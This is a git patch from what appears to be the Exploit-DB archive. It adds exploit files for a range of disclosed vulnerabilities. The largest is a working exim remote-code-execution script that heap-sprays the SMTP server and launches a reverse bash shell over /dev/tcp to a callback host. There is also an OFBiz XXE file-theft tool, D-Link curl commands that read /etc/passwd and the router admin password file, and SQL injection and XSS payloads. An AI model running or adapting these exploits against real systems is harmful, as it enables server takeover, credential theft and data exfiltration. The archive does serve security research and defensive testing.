From dac8dd47314d9716439cd572a606f0220a32c4b0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-25 15 changes to exploits/shellcodes Adult Filter 1.0 - Denial of Service (PoC) Microsoft Data Sharing - Local Privilege Escalation (PoC) Webmin 1.5 - Web Brute Force (CGI) exim 4.90 - Remote Code Execution School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection SG ERP 1.0 - 'info' SQL Injection Fifa Master XLS 2.3.2 - 'usw' SQL Injection Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Apache OFBiz 16.11.04 - XML External Entity Injection D-Link Routers - Command Injection D-Link Routers - Plaintext Password D-Link Routers - Directory Traversal Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes --- exploits/aspx/webapps/45668.txt | 13 + exploits/hardware/webapps/45676.md | 23 + exploits/hardware/webapps/45677.md | 24 + exploits/hardware/webapps/45678.md | 27 + exploits/java/webapps/45673.py | 125 ++++ exploits/linux/remote/45671.py | 605 +++++++++++++++++++ exploits/multiple/remote/{745.cgi => 745.pl} | 0 exploits/php/webapps/45666.txt | 89 +++ exploits/php/webapps/45667.txt | 61 ++ exploits/php/webapps/45672.txt | 48 ++ exploits/windows/local/45675.md | 17 + exploits/windows_x86/dos/45670.txt | 27 + files_exploits.csv | 19 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/45669.c | 52 ++ 15 files changed, 1127 insertions(+), 4 deletions(-) create mode 100644 exploits/aspx/webapps/45668.txt create mode 100644 exploits/hardware/webapps/45676.md create mode 100644 exploits/hardware/webapps/45677.md create mode 100644 exploits/hardware/webapps/45678.md create mode 100755 exploits/java/webapps/45673.py create mode 100755 exploits/linux/remote/45671.py rename exploits/multiple/remote/{745.cgi => 745.pl} (100%) mode change 100644 => 100755 create mode 100644 exploits/php/webapps/45666.txt create mode 100644 exploits/php/webapps/45667.txt create mode 100644 exploits/php/webapps/45672.txt create mode 100644 exploits/windows/local/45675.md create mode 100644 exploits/windows_x86/dos/45670.txt create mode 100644 shellcodes/linux_x86/45669.c diff --git a/exploits/aspx/webapps/45668.txt b/exploits/aspx/webapps/45668.txt new file mode 100644 index 000000000..ece6317c9 --- /dev/null +++ b/exploits/aspx/webapps/45668.txt @@ -0,0 +1,13 @@ +# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting +# Dork: n/a +# Date: 2018-10-11 +# Exploit Author: Dino Barlattani +# Vendor Homepage: http://axiositalia.it/ +# Software Link: http://axiositalia.it/?page_id=1907 +# Version: 1.7.0/7.0.0 +# Category: Webapps +# Platform: ASPX +# CVE: N/A + +# POC: +# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters= \ No newline at end of file diff --git a/exploits/hardware/webapps/45676.md b/exploits/hardware/webapps/45676.md new file mode 100644 index 000000000..8359a647b --- /dev/null +++ b/exploits/hardware/webapps/45676.md @@ -0,0 +1,23 @@ +## Shell command injection +CVE: CVE-2018-10823 + +CVSS v3: 9.1 +AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + +Description: An issue was discovered on D-Link routers: + +DWR-116 through 1.06, +DWR-512 through 2.02, +DWR-712 through 2.02, +DWR-912 through 2.02, +DWR-921 through 2.02, +DWR-111 through 1.01, +and probably others with the same type of firmware. +An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + +PoC: + +Login to the router. +Request the following URL after login: +`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd` +See the passwd file contents in the response. \ No newline at end of file diff --git a/exploits/hardware/webapps/45677.md b/exploits/hardware/webapps/45677.md new file mode 100644 index 000000000..850b3128c --- /dev/null +++ b/exploits/hardware/webapps/45677.md @@ -0,0 +1,24 @@ +## Password stored in plaintext +CVE: CVE-2018-10824 + +Description: + +An issue was discovered on D-Link routers: + +DWR-116 through 1.06, +DIR-140L through 1.02, +DIR-640L through 1.02, +DWR-512 through 2.02, +DWR-712 through 2.02, +DWR-912 through 2.02, +DWR-921 through 2.02, +DWR-111 through 1.01, +and probably others with the same type of firmware. +NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple + +The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access. + +PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822 + +`$ curl http://routerip/uir//tmp/XXX/0` +This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication. \ No newline at end of file diff --git a/exploits/hardware/webapps/45678.md b/exploits/hardware/webapps/45678.md new file mode 100644 index 000000000..893abdc59 --- /dev/null +++ b/exploits/hardware/webapps/45678.md @@ -0,0 +1,27 @@ +Directory Traversal +CVE: CVE-2018-10822 + +CVSS v3: 8.6 +AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + +Description: Directory traversal vulnerability in the web interface on D-Link routers: + +DWR-116 through 1.06, +DIR-140L through 1.02, +DIR-640L through 1.02, +DWR-512 through 2.02, +DWR-712 through 2.02, +DWR-912 through 2.02, +DWR-921 through 2.02, +DWR-111 through 1.01, +and probably others with the same type of firmware +allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + +NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190. + +PoC: + +`$ curl http://routerip/uir//etc/passwd` +The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824. + +This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash. \ No newline at end of file diff --git a/exploits/java/webapps/45673.py b/exploits/java/webapps/45673.py new file mode 100755 index 000000000..2673ad0cd --- /dev/null +++ b/exploits/java/webapps/45673.py @@ -0,0 +1,125 @@ +# Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection +# Date: 2018-10-15 +# Exploit Author: Jamie Parfet +# Vendor Homepage: https://ofbiz.apache.org/ +# Software Link: https://archive.apache.org/dist/ofbiz/ +# Version: < 16.11.04 +# Tested on: Ubuntu 18.04.1 +# CVE: N/A + +#!/usr/bin/env python3 +# ***************************************************** +# Type: XML External Entity Injection (File disclosure) +# Target: Apache OFBiz < 16.11.04 +# Author: Jamie Parfet +# ***************************************************** +import sys +import os +import requests +import urllib3 +import re +import argparse + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +simple_payload = """]> +xXx +&disclose;xXx +""" + +if len(sys.argv) <= 1: + print('[*] Apache OFBiz < 16.11.04 XXE') + print('[*] Use "%s -h" to display help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", + metavar="https://localhost:8443", + dest="url", + required=True, + help="Target URL (required)", + action='store') +parser.add_argument("-f", + metavar="/etc/passwd", + dest="file", + help="Target file", + action='store') +parser.add_argument("-c", + metavar="/home/", + dest="crawl", + help="Target directory to start crawling from", + action='store') +parser.add_argument("-o", + metavar="~/local/output/directory/", + dest="output_dir", + help="Local directory that remote file will be saved to", + action='store') +args = parser.parse_args() +url = args.url if args.url else None +target_file = args.file if args.file else None +crawl_dir = args.crawl if args.crawl else None +output_dir = args.output_dir if args.output_dir else None + + +def check_url(url): + if '://' not in url: + print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url)) + exit(0) + else: + return url + + +def request(url, payload): + response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).text + parsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response) + return parsed_response + + +def crawl(crawl_dir): + payload = simple_payload.format(crawl_dir) + response = request(url, payload) + payload_404 = simple_payload.format(crawl_dir + "/xX404Xx") + response_404 = request(url, payload_404) + if 'No such file or directory' in response: + print("[-] ERROR - 404: {}".format(crawl_dir)) + elif 'Permission denied' in response or 'but is not accessible' in response: + print("[-] ERROR - Permission: {}".format(crawl_dir)) + elif 'Not a directory' in response_404: + print("[*] FILE: {}".format(crawl_dir)) + else: + print("[*] DIR: {}".format(crawl_dir)) + for f in response.splitlines(): + full_path = (crawl_dir + '/' + f) + crawl(full_path) + + +def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir): + if url: + check_url(url) + if crawl_dir: + crawl(crawl_dir) + else: + payload = simple_payload.format(target_file) + if output_dir: + if os.path.isdir(output_dir): + result = request(url, payload) + remote_file_name = re.sub('/', '--', target_file) + output_file = (output_dir + '/' + remote_file_name[2:]) + file = open(output_file, 'w') + file.write(result) + file.close() + else: + print("[-] ERROR: {} is not a writeable directory".format(output_dir)) + else: + result = request(url, payload) + print(result) + + +if __name__ == '__main__': + try: + main() + except KeyboardInterrupt: + print('\nKeyboard interrupt detected.') + print('Exiting...') + exit(0) \ No newline at end of file diff --git a/exploits/linux/remote/45671.py b/exploits/linux/remote/45671.py new file mode 100755 index 000000000..a954ed385 --- /dev/null +++ b/exploits/linux/remote/45671.py @@ -0,0 +1,605 @@ +# Exploit Title: exim 4.90 - Remote Code Execution +# Date: 2018-10-24 +# Exploit Author: hackk.gr +# Vendor Homepage: exim.org +# Version: exim < 4.90 +# Tested on: debian exim 4.89, ubuntu exim 4.86_2 +# CVE : CVE-2018-6789 + +#!/usr/bin/python +#debian exim 4.89 +#ubuntu exim 4.86_2 +import time +import socket +import struct +import os +import os.path +import sys +import ssl +import random +from multiprocessing import Process, Queue + +s = None +f = None +test = True +rcpt_index_start = 0x120 +bufsize = 8200 + +def connect(host, port): + global s + global f + s = socket.create_connection((host,port)) + f = s.makefile("rw", bufsize=0) + +def p(v): + return struct.pack(" -1: + auth_plain_available = True + + if test: + if len(l) > 70: + sys.stdout.write(l[:70] + " ...\n") + sys.stdout.flush() + else: + print l.strip("\r").strip("\n") + + data = data + l + if data.find(delim) > -1: + return data + if l == "\n" or l == "": + return "" + return data + +def write(data): + f.write(data + "\n") +def ehlo(v): + write("EHLO " + v) + return readuntil('HELP') +def unrec(v): + write(v) + readuntil('command') +def auth_plain(v): + encode = v.encode('base64').replace('\n','').replace('=','') + write("AUTH PLAIN " + encode) + l = f.readline() + if test: + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l +def auth_plain1(v): + encode = v.encode('base64').replace('\n','').replace('=','') + write("AUTH PLAIN " + encode) + l = f.readline() + if test: + if l.find("Incorrect") > -1: + raise Exception("WRONG DRIVER") + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l +def auth_plain2(v,value): + encode = v.encode('base64').replace('\n','').replace('=','') + value = chr(value).encode('base64').replace('\n','').replace('=','') + write("AUTH PLAIN " + encode[:-1] + value) + l = f.readline() + if test: + if l.find("Incorrect") > -1: + raise Exception("WRONG DRIVER") + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l +def one_byte_overwrite(): + v = "C" * bufsize + encode = v.encode('base64').replace('\n','').replace('=','') + encode = encode[:-1] + "PE" + write("AUTH PLAIN " + encode) + l = f.readline() + if test: + if l.find("Incorrect") > -1: + raise Exception("WRONG DRIVER") + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l + +lookup_table = {0x00: [0,3], +0x01: [0,7], +0x02: [0,11], +0x03: [0,15], +0x04: [0,19], +0x05: [0,23], +0x06: [0,27], +0x07: [0,31], +0x08: [0,35], +0x09: [0,39], +0x0a: [0,43], +0x0b: [0,47], +0x0c: [0,51], +0x0d: [0,55], +0x0e: [0,59], +0x0f: [0,63], +0x10: [0,67], +0x11: [0,71], +0x12: [0,75], +0x13: [0,79], +0x14: [0,83], +0x15: [0,87], +0x16: [0,91], +0x17: [0,95], +0x18: [0,99], +0x19: [0,103], +0x1a: [0,107], +0x1b: [0,111], +0x1c: [0,115], +0x1d: [0,119], +0x1e: [0,123], +0x1f: [0,127], +0x20: [0,131], +0x21: [0,135], +0x22: [0,139], +0x23: [0,143], +0x24: [0,147], +0x25: [0,151], +0x26: [0,155], +0x27: [0,159], +0x28: [0,163], +0x29: [0,167], +0x2a: [0,171], +0x2b: [0,175], +0x2c: [0,179], +0x2d: [0,183], +0x2e: [0,187], +0x2f: [0,191], +0x30: [0,195], +0x31: [0,199], +0x32: [0,203], +0x33: [0,207], +0x34: [0,211], +0x35: [0,215], +0x36: [0,219], +0x37: [0,223], +0x38: [0,227], +0x39: [0,231], +0x3a: [0,235], +0x3b: [0,239], +0x3c: [0,243], +0x3d: [0,247], +0x3e: [0,251], +0x3f: [0,254], +0x40: [64,3], +0x41: [64,7], +0x42: [64,11], +0x43: [64,15], +0x44: [64,19], +0x45: [64,23], +0x46: [64,27], +0x47: [64,31], +0x48: [64,35], +0x49: [64,39], +0x4a: [64,43], +0x4b: [64,47], +0x4c: [64,51], +0x4d: [64,55], +0x4e: [64,59], +0x4f: [64,63], +0x50: [64,67], +0x51: [64,71], +0x52: [64,75], +0x53: [64,79], +0x54: [64,83], +0x55: [64,87], +0x56: [64,91], +0x57: [64,95], +0x58: [64,99], +0x59: [64,103], +0x5a: [64,107], +0x5b: [64,111], +0x5c: [64,115], +0x5d: [64,119], +0x5e: [64,123], +0x5f: [64,127], +0x60: [64,131], +0x61: [64,135], +0x62: [64,139], +0x63: [64,143], +0x64: [64,147], +0x65: [64,151], +0x66: [64,155], +0x67: [64,159], +0x68: [64,163], +0x69: [64,167], +0x6a: [64,171], +0x6b: [64,175], +0x6c: [64,179], +0x6d: [64,183], +0x6e: [64,187], +0x6f: [64,191], +0x70: [64,195], +0x71: [64,199], +0x72: [64,203], +0x73: [64,207], +0x74: [64,211], +0x75: [64,215], +0x76: [64,219], +0x77: [64,223], +0x78: [64,227], +0x79: [64,231], +0x7a: [64,235], +0x7b: [64,239], +0x7c: [64,243], +0x7d: [64,247], +0x7e: [64,251], +0x7f: [64,254], +0x80: [128,3], +0x81: [128,7], +0x82: [128,11], +0x83: [128,15], +0x84: [128,19], +0x85: [128,23], +0x86: [128,27], +0x87: [128,31], +0x88: [128,35], +0x89: [128,39], +0x8a: [128,43], +0x8b: [128,47], +0x8c: [128,51], +0x8d: [128,55], +0x8e: [128,59], +0x8f: [128,63], +0x90: [128,67], +0x91: [128,71], +0x92: [128,75], +0x93: [128,79], +0x94: [128,83], +0x95: [128,87], +0x96: [128,91], +0x97: [128,95], +0x98: [128,99], +0x99: [128,103], +0x9a: [128,107], +0x9b: [128,111], +0x9c: [128,115], +0x9d: [128,119], +0x9e: [128,123], +0x9f: [128,127], +0xa0: [128,131], +0xa1: [128,135], +0xa2: [128,139], +0xa3: [128,143], +0xa4: [128,147], +0xa5: [128,151], +0xa6: [128,155], +0xa7: [128,159], +0xa8: [128,163], +0xa9: [128,167], +0xaa: [128,171], +0xab: [128,175], +0xac: [128,179], +0xad: [128,183], +0xae: [128,187], +0xaf: [128,191], +0xb0: [128,195], +0xb1: [128,199], +0xb2: [128,203], +0xb3: [128,207], +0xb4: [128,211], +0xb5: [128,215], +0xb6: [128,219], +0xb7: [128,223], +0xb8: [128,227], +0xb9: [128,231], +0xba: [128,235], +0xbb: [128,239], +0xbc: [128,243], +0xbd: [128,247], +0xbe: [128,251], +0xbf: [128,254], +0xc0: [192,3], +0xc1: [192,7], +0xc2: [192,11], +0xc3: [192,15], +0xc4: [192,19], +0xc5: [192,23], +0xc6: [192,27], +0xc7: [192,31], +0xc8: [192,35], +0xc9: [192,39], +0xca: [192,43], +0xcb: [192,47], +0xcc: [192,51], +0xcd: [192,55], +0xce: [192,59], +0xcf: [192,63], +0xd0: [192,67], +0xd1: [192,71], +0xd2: [192,75], +0xd3: [192,79], +0xd4: [192,83], +0xd5: [192,87], +0xd6: [192,91], +0xd7: [192,95], +0xd8: [192,99], +0xd9: [192,103], +0xda: [192,107], +0xdb: [192,111], +0xdc: [192,115], +0xdd: [192,119], +0xde: [192,123], +0xdf: [192,127], +0xe0: [192,131], +0xe1: [192,135], +0xe2: [192,139], +0xe3: [192,143], +0xe4: [192,147], +0xe5: [192,151], +0xe6: [192,155], +0xe7: [192,159], +0xe8: [192,163], +0xe9: [192,167], +0xea: [192,171], +0xeb: [192,175], +0xec: [192,179], +0xed: [192,183], +0xee: [192,187], +0xef: [192,191], +0xf0: [192,195], +0xf1: [192,199], +0xf2: [192,203], +0xf3: [192,207], +0xf4: [192,211], +0xf5: [192,215], +0xf6: [192,219], +0xf7: [192,223], +0xf8: [192,227], +0xf9: [192,231], +0xfa: [192,235], +0xfb: [192,239], +0xfc: [192,243], +0xfd: [192,247], +0xfe: [192,251], +0xff: [192,254], +} + +def exploit(b1, b2, b3, rcpt_index, target, cb, cbport): + global s + global f + + #if c % 0x50 == 0: + # print " byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x" % (b1, b2, b3, rcpt_index) + + try: + connect(target, 25) + except: + raise Exception("CONNECTION ERROR") + + banner = f.readline() + if test: + print banner.strip("\r").strip("\n") + + ehlo("A" * 8000) + + ehlo("B" * 16) + + unrec("\xff" * 2000) + ehlo("D" * bufsize) + one_byte_overwrite() + + fake_header = p(0) + fake_header += p(0x1f51) + res = auth_plain1("E" * 176 + fake_header + "E" * (bufsize-176-len(fake_header))) + + res = ehlo("F" * 16) + if res == "": + raise Exception("CRASHED") + + unrec("\xff" * 2000) + unrec("\xff" * 2000) + + fake_header = p(0x4110) + fake_header += p(0x1f50) + auth_plain("G" * 176 + fake_header + "G" * (bufsize-176-len(fake_header))) + + auth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1]) + res = ehlo("I" * 16) + + if res == "": + s.close() + f.close() + raise Exception("EHLO(I)") + + acl_smtp_rcpt_offset = rcpt_index + local_host = cb + local_port = cbport + cmd = "/usr/bin/setsid /bin/bash -c \"/bin/bash --rcfile <(echo 'echo " + "0x%02x " % b1 + "0x%02x " % b2 + "0x%02x " % b3 + "0x%04x " % rcpt_index + "') -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\"" + cmd_expansion_string = "${run{" + cmd + "}}\0" + + auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\x00")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string))) + + write("MAIL FROM:") + + res = f.readline() + + if res != "": + if test: + raise Exception("NO TARGET") + raise Exception("OFFSET") + + raise Exception("BYTE") + + write("RCPT TO:") + readuntil("Accepted") + + write("RCPT TO:") + if f.readline() == "": + s.close() + f.close() + raise Exception("RCPT TO") + +def checkvuln(host): + try: + exploit(0xff, 0xff, 0xff, rcpt_index_start, host, "127.0.0.1", "1337") + except Exception as e: + print e + if str(e) == "EHLO(I)": + return True + return False + +def _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q): + if b1 > 0xff or b2 > 0xff or b3 > 0xff: + q.put([b1,b2,b3,"VALUE"]) + return + try: + exploit(b1, b2, b3, rcpt_index, target, cb, cbport) + except Exception as e: + e = str(e) + if e == "[Errno 104] Connection reset by peer" or e.find("EOF occurred") > -1: + e = "BYTE" + q.put([b1,b2,b3,e]) + +if __name__ == '__main__': + if len(sys.argv) < 4: + print "%s " % sys.argv[0] + sys.exit(1) + + target = sys.argv[3] + cb = sys.argv[1] + cbport = sys.argv[2] + + if len(sys.argv) == 8: + print "reuse fixed offsets" + b1 = int(sys.argv[4], 16) + b2 = int(sys.argv[5], 16) + b3 = int(sys.argv[6], 16) + rcpt_index = int(sys.argv[7], 16) + + try: + exploit(b1, b2, b3, rcpt_index, target, cb, cbport) + except Exception as e: + print e + sys.exit(1) + + print "check vuln" + if not checkvuln(target): + print "false" + sys.exit(1) + + print "true" + test=False + + allbytes = [offset for offset in xrange(0, 0x110)] + allbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)] + b3_survived = [] + + b3_survived_stop = False + tested = [] + try: + q = Queue() + procs = [] + print + print "Discover first byte in offset" + print + sys.stdout.write("Try Offsets %02x%02x%02x to %02x%02x%02x ..." % (0x00,0xff,0xff,0xff,0xff,0xff)) + for b3 in allbytes: + if b3 % 0x10 == 0 and b3 <= 0xff: + sys.stdout.write("\rTry Offsets %02x%02x%02x to %02x%02x%02x ..." % (b3,0xff,0xff,0xff,0xff,0xff)) + + b1 = 0x00 + + for b2 in allbytes_10: + proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) + procs.append(proc) + proc.daemon = True + proc.start() + + to_break = False + if len(procs) == 16: + for i in xrange(0,16): + result = q.get() + if result[3] == "BYTE": + if [b3, b2] not in tested: + tested.append([b3, b2]) + b3_survived.append(result[2]) + sys.stdout.write("\nOffset %02x%02x%02x Survived ..." % (result[2],result[1],result[0])) + else: + to_break = True + + procs[:] = [] + if to_break: + break + + print "\n" + print "Discover offsets for rcpt index brute force ..." + print + b1_survived = {} + for b3 in b3_survived: + for b2 in allbytes: + if b2 % 0x10 == 0 and b2 <= 0xff: + sys.stdout.write("\r\r\nTry Offsets %02x%02x%02x to %02x%02x%02x ... " % (b3,b2,0x00,b3,0xff,0xf0)) + for b1 in allbytes_10: + proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) + procs.append(proc) + proc.daemon = True + proc.start() + + if len(procs) == 16: + for i in xrange(0,16): + result = q.get() + if result[3] == "OFFSET": + if result[2] not in b1_survived: + b1_survived[result[2]] = [] + b1_survived[result[2]].append(result) + sys.stdout.write("\n%02x%02x%02x Survived ..." % (result[2],result[1],result[0])) + + procs[:] = [] + + iteration_list = [n for n in xrange(0x100,0x1000,0x10)] + iteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)] + + for n in iteration_list2: + iteration_list.append(n) + + b1_survived_priority = [] + b1_survived_additional = [] + + for key in sorted(b1_survived): + if len(b1_survived[key]) < 7: + b1_survived_priority.append(b1_survived[key]) + else: + b1_survived_additional.append(b1_survived[key]) + + _b1_survived = [] + for result in b1_survived_priority: + _b1_survived.append(result) + for result in b1_survived_additional: + _b1_survived.append(result) + + print "\n" + print "Start rcpt index brute force ..." + print + + for result in _b1_survived: + for s in result: + sys.stdout.write("\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ..." % (s[2],s[1],s[0])) + for rcpt_index in iteration_list: + proc = Process(target=_exploit, args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q)) + procs.append(proc) + proc.daemon = True + proc.start() + + if len(procs) == 16: + for i in xrange(0,16): + q.get() + + procs[:] = [] + except KeyboardInterrupt: + pass + + print "done." \ No newline at end of file diff --git a/exploits/multiple/remote/745.cgi b/exploits/multiple/remote/745.pl old mode 100644 new mode 100755 similarity index 100% rename from exploits/multiple/remote/745.cgi rename to exploits/multiple/remote/745.pl diff --git a/exploits/php/webapps/45666.txt b/exploits/php/webapps/45666.txt new file mode 100644 index 000000000..7830d6a94 --- /dev/null +++ b/exploits/php/webapps/45666.txt @@ -0,0 +1,89 @@ +# Exploit Title: SG ERP 1.0 - 'info' SQL Injection +# Dork: N/A +# Date: 2018-10-24 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://fankstribe.org/ +# Software Link: https://sourceforge.net/projects/sgerp/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/valida_login.php +# +# [PATH]/valida_login.php +# +# 05 $login = @$_POST['login']; +# 06 $senha = @$_POST['senha']; + +# POST /[PATH]/valida_login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 19 +login='='&senha='=' +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 15:43:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 46 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +# http://localhost/[PATH]/index.php +GET /ExploitDb/GP%20ERP/index.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/valida_login.php +Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 15:43:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1950 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?mod=est&bot=tes3&info=[SQL] + +GET /[PATH]/index.php?mod=est&bot=tes3&info=-4++uniOn++selecT+0x496873616e%2c0x496873616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e-- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 15:50:17 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45667.txt b/exploits/php/webapps/45667.txt new file mode 100644 index 000000000..e4fbcf119 --- /dev/null +++ b/exploits/php/webapps/45667.txt @@ -0,0 +1,61 @@ +# Exploit Title: Fifa Master XLS 2.3.2 - 'usw' SQL Injection +# Dork: N/A +# Date: 2018-10-24 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://fankstribe.org/ +# Software Link: https://sourceforge.net/projects/fifamasterxls/files/latest/download +# Version: 2.3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/chat.php?action=chatname&usw=[SQL] +# +# Registered users can run... +/* `exploitdb`.`f_user` */ +$f_user = array( + array('userID' => '2','access' => 'Registered','userName' => 'efe','firstname' => 'efe','lastName' => 'efe','userEmail' => 'efe@omerefe.com','userPassword' => 'a0b92793d636e4ccee294c6548cb35b3','avatar' => '0.jpg','ban' => '0') +); +# + +# [PATH]/chat.php 166 +# +# 163 function chatName() { +# 164 $un = ''; +# 165 global $con; +# 166 $su=$_GET['usw']; +# 167 +# 168 $sc2=mysql_query("select userName from f_user where userID='$su' limit 1"); +# 169 while($row_sc2=mysql_fetch_array($sc2)) +# 170 { + +# [PATH]/js/chat.js 337 +# +# 336 jQuery.ajax({ +# 337 url: "chat.php?action=chatname&usw="+item.f, +# 338 cache: false, +# 339 dataType: "json", +# 340 async: false, 